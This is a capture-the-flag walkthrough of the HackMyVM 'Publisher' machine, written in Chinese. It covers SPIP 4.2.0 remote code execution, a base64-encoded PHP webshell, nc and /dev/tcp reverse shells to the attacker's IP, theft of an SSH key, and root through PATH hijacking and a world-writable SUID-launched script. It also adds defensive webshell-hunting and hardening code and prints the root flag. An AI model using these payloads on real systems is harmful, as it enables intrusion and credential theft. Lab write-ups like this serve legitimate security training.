HackMyVM-Publisher-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

sudo arp-scan -l           
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:a0:18:b4 (Unknown)
192.168.56.116 08:00:27:47:76:41 (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.870 seconds (136.90 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 09:18 EDT
Nmap scan report for 192.168.56.116
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.56.116 -p 22,80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 09:20 EDT
Nmap scan report for 192.168.56.116
Host is up (0.0012s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.32 seconds

Port 80 is open, so without further ado I opened it in the browser to see what it is.

[screenshot]

SPIP is a CMS, basically a blog platform similar to WordPress, so there are surely vulnerabilities for this version. Time for searchsploit... oh wait, I don't know the version yet.

Directory Scanning

Scan the directories and cross-check at the same time.

 ___  ___  __   __     __      __         __   ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.116
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 9l 28w 317c http://192.168.56.116/images => http://192.168.56.116/images/
200 GET 32l 224w 17917c http://192.168.56.116/images/ads.jpg
200 GET 354l 770w 5959c http://192.168.56.116/style.css
200 GET 17l 96w 5807c http://192.168.56.116/images/templatmeo_column_two_bg.jpg
200 GET 8l 45w 3539c http://192.168.56.116/images/180_column_bg.jpg
200 GET 142l 610w 69796c http://192.168.56.116/images/image_02.jpg
200 GET 69l 74w 4051c http://192.168.56.116/images/comment_icon.jpg
200 GET 237l 1368w 110318c http://192.168.56.116/images/image_01.jpg
200 GET 9l 69w 8953c http://192.168.56.116/images/menu_bg.jpg
200 GET 7l 13w 379c http://192.168.56.116/images/menu_bg_repeat.jpg
200 GET 81l 462w 49772c http://192.168.56.116/images/bottom_panel_bg.jpg
200 GET 150l 766w 8686c http://192.168.56.116/
200 GET 109l 602w 53555c http://192.168.56.116/images/logo.jpg
200 GET 132l 1196w 102457c http://192.168.56.116/images/top_bg.jpg
301 GET 9l 28w 315c http://192.168.56.116/spip => http://192.168.56.116/spip/ # from here on it found the spip directory
301 GET 9l 28w 319c http://192.168.56.116/spip/tmp => http://192.168.56.116/spip/tmp/
200 GET 3l 13w 83c http://192.168.56.116/spip/tmp/remove.txt

Visiting /spip, there still seems to be no version information on the page, but it appears in the Composed-By response header. Since it is 4.2.0, that makes things easier.

[screenshot]

Searching for an Exploit

Conveniently, there is exactly one exploit.

┌──(kali㉿kali)-[~]                                                                                  
└─$ searchsploit spip 4.2.0
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
SPIP v4.2.0 - Remote Code Execution (Unauthenticated) | php/webapps/51536.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Copy it locally and cat it.

[screenshot]

The screenshot was cut off. Reading the description, you need the ?page=login page; when I tried it, it reported "Unable to find Anti-CSRF token".

Next I captured the traffic with Burp Suite and noticed a password-recovery page that doesn't ask for a username, only an email address.

[screenshot]

I entered a random email address and caught a key detail: the form action name is oubli.

[screenshot]

Most likely this is the SSH username.

But how to get a webshell through SPIP is the question.

OK, that was the wrong direction; the exploit actually can be run.

Trying to plant a one-liner webshell

The payload is the one-liner webshell, first base64-encoded and then decoded on the target. I'm not sure why <?php eval($_POST[a]);?> can't be used and only the backtick form works; I asked GPT, and it's probably a difference in request method.

[screenshot]

┌──(kali㉿kali)-[~]
└─$ python3 51536.py -u http://192.168.56.116/spip -c 'echo "PD89YCRfR0VUWzBdYD8+" | base64 -d > webshell.php' ## "PD89YCRfR0VUWzBdYD8+" here decodes to <?=`$_GET[0]`?>
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=whoami
www-data
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=ls+-al
total 168
drwxr-xr-x 11 www-data www-data 4096 Sep 10 22:42 .
drwxr-x--- 5 www-data www-data 4096 Dec 20 2023 ..
-rwxr-xr-x 1 www-data www-data 7045 Dec 20 2023 CHANGELOG.md
drwxr-xr-x 3 www-data www-data 4096 Dec 20 2023 IMG
-rwxr-xr-x 1 www-data www-data 35147 Dec 20 2023 LICENSE
-rwxr-xr-x 1 www-data www-data 842 Dec 20 2023 README.md
-rwxr-xr-x 1 www-data www-data 178 Dec 20 2023 SECURITY.md
-rwxr-xr-x 1 www-data www-data 1761 Dec 20 2023 composer.json
-rwxr-xr-x 1 www-data www-data 27346 Dec 20 2023 composer.lock
drwxr-xr-x 3 www-data www-data 4096 Dec 20 2023 config
drwxr-xr-x 22 www-data www-data 4096 Dec 20 2023 ecrire
-rwxr-xr-x 1 www-data www-data 4307 Dec 20 2023 htaccess.txt
-rwxr-xr-x 1 www-data www-data 42 Dec 20 2023 index.php
drwxr-xr-x 5 www-data www-data 4096 Dec 20 2023 local
drwxr-xr-x 22 www-data www-data 4096 Dec 20 2023 plugins-dist
-rwxr-xr-x 1 www-data www-data 3645 Dec 20 2023 plugins-dist.json
drwxr-xr-x 12 www-data www-data 4096 Dec 20 2023 prive
-rwxr-xr-x 1 www-data www-data 973 Dec 20 2023 spip.php
-rwxr-xr-x 1 www-data www-data 1212 Dec 20 2023 spip.png
-rwxr-xr-x 1 www-data www-data 1673 Dec 20 2023 spip.svg
drwxr-xr-x 10 www-data www-data 4096 Dec 20 2023 squelettes-dist
-rw-rw-rw- 1 www-data www-data 2 Sep 10 22:26 test
drwxr-xr-x 6 www-data www-data 4096 Sep 11 16:39 tmp
drwxr-xr-x 6 www-data www-data 4096 Dec 20 2023 vendor
-rw-rw-rw- 1 www-data www-data 15 Sep 11 17:01 webshell.php
-rw-rw-rw- 1 www-data www-data 28 Sep 10 22:47 webshell1.php

Command output clearly comes back, so I tried a reverse shell with nc, but it didn't connect. I tried wget-ing php-reverse-shell.php from my machine; the request returned 200, but the file still wasn't on the target, maybe there is some filtering. Fortunately, the www-data user can read the user's home folder.

┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=nc+-e+/bin/bash+192.168.56.102+4444
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=ls+-al+/home/think/user.txt
-rw-r--r-- 1 root root 35 Feb 10 2024 /home/think/user.txt

Good, I got the user flag, but for privilege escalation I first need a stable shell; this can't go on like this. Later I found I could connect via SSH.
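A defender-side check for what the web stage above leaves behind: the one-liner sits in the web root as a world-writable .php file that feeds a request parameter straight into backtick execution. The following function is an added example, not from the original post (find_suspicious_php is an assumed name), and flags both conditions under a directory:

```shell
#!/bin/sh
# Added example (not from the original post): hunt a PHP web root for files
# that look like the webshell planted above. Two signals, either is enough:
#   - code that passes a request parameter straight into execution, e.g.
#     <?=`$_GET[0]`?> (backticks), eval(...), or system($_POST[...])
#   - a .php file that is world-writable, as webshell.php was (-rw-rw-rw-)
# GNU stat/find/grep are assumed (Linux). Prints "<reason>\t<path>" per hit;
# returns 0 if anything was flagged, 1 if the tree looks clean.
find_suspicious_php() {
    dir=$1
    pat='`[[:space:]]*\$_(GET|POST|REQUEST|COOKIE)|eval[[:space:]]*\(|(system|passthru|shell_exec|exec)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)'
    hits=$(
        find "$dir" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
            if grep -Eq "$pat" "$f"; then
                printf 'exec-from-request\t%s\n' "$f"
            fi
            # last octal digit is "other"; 2, 3, 6 and 7 carry the write bit
            case "$(stat -c '%a' "$f")" in
                *[2367]) printf 'world-writable\t%s\n' "$f" ;;
            esac
        done
    )
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}
```

Run it as `find_suspicious_php /var/www/html` (or the spip directory) and review every hit by hand; a match is a lead, not proof.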

SSH Login

┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=ls+-al+/home/think
total 48
drwxr-xr-x 8 think think 4096 Feb 10 2024 .
drwxr-xr-x 1 root root 4096 Dec 7 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Nov 14 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Nov 14 2023 .bashrc
drwx------ 2 think think 4096 Nov 14 2023 .cache
drwx------ 3 think think 4096 Dec 8 2023 .config
drwx------ 3 think think 4096 Feb 10 2024 .gnupg
drwxrwxr-x 3 think think 4096 Jan 10 2024 .local
-rw-r--r-- 1 think think 807 Nov 14 2023 .profile
lrwxrwxrwx 1 think think 9 Feb 10 2024 .python_history -> /dev/null
drwxr-xr-x 2 think think 4096 Jan 10 2024 .ssh ### the SSH private key can be read
lrwxrwxrwx 1 think think 9 Feb 10 2024 .viminfo -> /dev/null
drwxr-x--- 5 www-data www-data 4096 Dec 20 2023 spip
-rw-r--r-- 1 root root 35 Feb 10 2024 user.txt
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.116/spip/webshell.php?0=cat+/home/think/.ssh/id_rsa >id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[key material omitted]
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh think@192.168.56.116 -i id_rsa
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-169-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 11 Sep 2024 05:20:22 PM UTC

System load: 0.0
Usage of /: 74.9% of 9.75GB
Memory usage: 30%
Swap usage: 0%
Processes: 202
Users logged in: 0
IPv4 address for br-72fdb218889f: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for enp0s3: 192.168.56.116


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Mar 29 13:22:11 2024 from 192.168.109.1
think@publisher:~$

Information Gathering

OK, I'm in; first do some casual enumeration.

Found a suspicious SUID file.

think@publisher:/tmp$ find / -perm -u=s -type f 2>/dev/null 
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container ## probably Docker-related
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
think@publisher:/tmp$ strings /usr/sbin/run_container ## fortunately the target has strings
/lib64/ld-linux-x86-64.so.2
libc.so.6
__stack_chk_fail
execve
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
GLIBC_2.4
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/bin/bash ## probably runs the script below with bash
/opt/run_container.sh ## suspicious
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
run_container.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
__stack_chk_fail@@GLIBC_2.4
__libc_start_main@@GLIBC_2.2.5
execve@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
think@publisher:/tmp$ cat /opt/run_container.sh
cat: /opt/run_container.sh: Permission denied
think@publisher:/tmp$ ls -al /opt/run_container.sh
-rwxrwxrwx 1 root root 1715 Mar 29 13:25 /opt/run_container.sh
think@publisher:/tmp$ cd /opt/
think@publisher:/opt$ ls
ls: cannot open directory '.': Permission denied
find / -perm -u=s -type f 2>/dev/null
/ means start from the top (root) of the filesystem and search every directory
-perm means search for the permission that follows
-u=s means the set-user-ID bit is set, i.e. files that run with their owner's (usually root's) privileges
-type means the type of file we are looking for
f means regular files, not directories or special files
2 means the process's second file descriptor, i.e. stderr (standard error)
> means redirect
/dev/null is a special filesystem object that discards everything written to it.

Don't know why, but this file can't be read even though the permission bits are there. No choice but to check other writeups; env shows the environment variables.

Found that the think user's shell is ash, not bash.

think@publisher:/tmp$ env
SHELL=/usr/sbin/ash ## restricted shell
PWD=/tmp
LOGNAME=think
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/think
LANG=en_US.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.56.102 38494 192.168.56.116 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=think
SHLVL=1
XDG_SESSION_ID=6
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.56.102 38494 22
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
SSH_TTY=/dev/pts/0
OLDPWD=/opt
_=/usr/bin/env

Privilege Escalation to Root

My thinking all along was: since /usr/sbin/run_container executes /opt/run_container.sh, just modify that shell script. But no permission!

Although /opt/run_container.sh can't be viewed or modified, it can be executed directly.

think@publisher:/tmp$ /opt/run_container.sh
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied ## also permission denied here
docker: permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create": dial unix /var/run/docker.sock: connect: permission denied.
See 'docker run --help'.
List of Docker containers:
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied

Enter the ID of the container or leave blank to create a new one: 1 ## prompts for a container ID or to create one
/opt/run_container.sh: line 16: validate_container_id: command not found ## says the validate_container_id command at line 16 of the script was not found

OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container:

This should be a command-hijacking point.

think@publisher:/tmp$ echo -n "bash -i &>/dev/tcp/192.168.56.102/4444 <&1">validate_container_id
think@publisher:/tmp$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp
think@publisher:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp
think@publisher:~$ validate_container_id
bash: /tmp/validate_container_id: Permission denied
think@publisher:~$ chmod +x /tmp/validate_container_id
think@publisher:~$ /opt/run_container.sh
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied
docker: permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create": dial unix /var/run/docker.sock: connect: permission denied.
See 'docker run --help'.
List of Docker containers:
permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied

Enter the ID of the container or leave blank to create a new one: 1 ## the container ID doesn't actually matter, type anything; after Enter it hangs, and by then the listener on the other side has already received the reverse shell

I thought the shell I got would be root, but it's still think. At least now I can view the /opt directory.

Looking at run_container.sh, line 16 indeed calls validate_container_id.

1:#!/bin/bash
2:
3:# Function to list Docker containers
4:list_containers() {
5:    if [ -z "$(docker ps -aq)" ]; then
6:        docker run -d --restart always -p 8000:8000 -v /home/think:/home/think 4b5aec41d6ef;
7:    fi
8:    echo "List of Docker containers:"
9:    docker ps -a --format "ID: {{.ID}} | Name: {{.Names}} | Status: {{.Status}}"
10:    echo ""
11:}
12:
13:# Function to prompt user for container ID
14:prompt_container_id() {
15:    read -p "Enter the ID of the container or leave blank to create a new one: " container_id
16:    validate_container_id "$container_id"
17:}
18:
19:# Function to display options and perform actions
20:select_action() {
21:    echo ""
22:    echo "OPTIONS:"
23:    local container_id="$1"
24:    PS3="Choose an action for a container: "
25:    options=("Start Container" "Stop Container" "Restart Container" "Create Container" "Quit")
26:
27:    select opt in "${options[@]}"; do
28:        case $REPLY in
29:            1) docker start "$container_id"; break ;;
30:            2) if [ $(docker ps -q | wc -l) -lt 2 ]; then
31:                   echo "No enough containers are currently running."
32:                   exit 1
33:               fi
34:               docker stop "$container_id"
35:               break ;;
36:            3) docker restart "$container_id"; break ;;
37:            4) echo "Creating a new container..."
38:               docker run -d --restart always -p 80:80 -v /home/think:/home/think spip-image:latest
39:               break ;;
40:            5) echo "Exiting..."; exit ;;
41:            *) echo "Invalid option. Please choose a valid option." ;;
42:        esac
43:    done
44:}
45:
46:# Main script execution
47:list_containers
48:prompt_container_id # Get the container ID from prompt_container_id function
49:select_action "$container_id" # Pass the container ID to select_action function
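The script above calls validate_container_id on line 16 without ever defining it and inherits the caller's PATH, and the file itself was world-writable (-rwxrwxrwx) while being launched as root by the SUID wrapper. A hardened rewrite of those pieces, added here as an example (not the box's script; harden_environment, script_is_trusted and the RUN_CONTAINER_MAIN switch are my names):

```shell
#!/bin/bash
# Hardened version of the weak parts of /opt/run_container.sh (an added
# example, not the box's own script). It is meant to be launched by a root
# SUID wrapper such as /usr/sbin/run_container, so it must trust nothing
# inherited from the calling user. Linux/GNU coreutils are assumed (stat -c).

# Fix 1: the original inherited the caller's PATH, so any writable directory
# on it (for example /tmp) could supply a fake "validate_container_id".
harden_environment() {
    PATH=/usr/sbin:/usr/bin:/sbin:/bin
    export PATH
    unset ENV BASH_ENV CDPATH IFS
}

# Fix 2: the function the original called on line 16 but never defined.
# Accept an empty ID (meaning "create a new container") or a Docker container
# ID, i.e. 12 or 64 lowercase hex characters. Returns 0 if valid, 1 if not.
validate_container_id() {
    [ -z "$1" ] && return 0
    printf '%s' "$1" | grep -Eq '^([0-9a-f]{12}|[0-9a-f]{64})$'
}

# Fix 3: refuse to run if the script file itself can be edited by others.
# $1 = path, $2 = uid that must own it (default 0, i.e. root).
# Returns 0 if the owner matches and the file is not group/world writable.
script_is_trusted() {
    f=$1
    want_uid=${2:-0}
    [ -f "$f" ] || return 1
    owner=$(stat -c '%u' "$f") || return 1
    mode=$(stat -c '%a' "$f") || return 1
    [ "$owner" = "$want_uid" ] || return 1
    # last two octal digits are group and other; 2, 3, 6 and 7 contain the
    # write bit, so any of them there means someone else can edit the file
    case "$mode" in
        *[2367]?|*[2367]) return 1 ;;
    esac
    return 0
}

# Prompt exactly as the original did, but actually validate the answer.
prompt_container_id() {
    printf '%s' "Enter the ID of the container or leave blank to create a new one: "
    read -r container_id
    if ! validate_container_id "$container_id"; then
        echo "Invalid container ID: $container_id" >&2
        exit 1
    fi
}

# Entry point, off by default so the functions above can be sourced and
# tested; run with RUN_CONTAINER_MAIN=1 to exercise the interactive flow.
if [ "${RUN_CONTAINER_MAIN:-0}" = 1 ]; then
    harden_environment
    script_is_trusted "$0" || { echo "refusing to run: $0 is group/world writable or not root-owned" >&2; exit 1; }
    prompt_container_id
    echo "container id accepted: '${container_id:-<new>}'"
fi
```

The SUID wrapper should additionally pass a clean environment to execve rather than the caller's, but the script-side checks above already close the two holes used in this box.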

Since run_container.sh can be modified directly, the rest is much simpler.

Just add the SUID bit to /bin/bash.

#!/bin/bash
chmod +s /bin/bash ## write these two lines into run_container.sh
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
think@publisher:~$ /usr/sbin/run_container ## this calls the shell script above
think@publisher:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash ## now bash has SUID

[screenshot]

think@publisher:~$ /bin/bash -p
bash-5.0# id
uid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# ls
root.txt spip
bash-5.0# cat root.txt
3a4225cc9e85709adda6ef55d6a4f2ca

OK, got it, but it took almost two days and my brain is fried.
